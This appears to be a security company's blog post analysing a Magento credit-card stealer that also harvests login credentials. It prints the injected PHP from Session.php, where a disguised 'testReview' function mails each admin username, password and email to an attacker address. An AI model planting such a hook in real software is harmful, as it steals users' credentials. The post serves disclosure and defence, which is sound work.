While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We posted a few times about this type of malware, but this one is a bit different in a way that it also steals the login credentials for the website users. All the ones we analyzed before never had such behaviour.
The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails to XXX@XXX.com every login and password:
class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
...skipped code...
protected function testReview($username, $password, $email)
{
$to = 'removed@removed.dom';
$subject = 'Webserver';
$message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
$headers = 'From: removed@removed.dom' . "\r\n" .
'Reply-To: removed@removed.dom' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
}
...skipped code...
public function login($username, $password, $request = null) {
...skipped code...
if ($user->getId()) {
$this->testReview($username, $password, $user->getEmail());
$this->renewSession();
...skipped code...
...skipped code...
This is the first time we see a malware on Magento that actually steals credentials alongside with credit card numbers. If you\’re using Magento as e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.